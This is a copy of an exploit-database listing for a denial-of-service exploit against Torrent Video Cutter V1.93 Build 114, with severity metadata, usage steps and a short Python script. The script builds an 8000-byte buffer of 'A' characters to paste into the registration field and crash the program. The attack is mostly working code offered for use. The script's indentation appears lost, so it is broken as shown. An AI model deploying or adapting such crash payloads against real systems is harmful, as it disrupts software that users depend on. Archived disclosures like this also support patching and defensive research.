Advertisement






Torrent Video Cutter V1.93 Build 114 Denial of Service Exploit

CVE Category Price Severity
CWE-399 Unavailable High
Author Risk Exploitation Type Date
Unknown High Remote 2022-04-22
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0.6793 0.80829

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022040081

Below is a copy:

Torrent Video Cutter V1.93 Build 114 Denial of Service Exploit
# Exploit Title: Torrent Video Cutter V1.93 Build 114 Denial of Service Exploit
# Date: 20.4.2022
# Vendor Homepage:http://www.torrentrockyou.com
# Software Link:  https://down10.software/download-torrent-video-cutter/post-download/
# Exploit Author: Achilles
# Tested Version: V1.93 Build 114
# Tested on: Windows 7 x64


# 1.- Run python code :Torrent_Cutter.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Torrent Video Cutter and Click Help and 'Register'
# 4.- Paste the content of EVIL.txt into the Field: 'Name and Code'
# 5.- Click 'OK' and you will see a crash.



#!/usr/bin/env python
buffer = "\x41" * 8000

try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.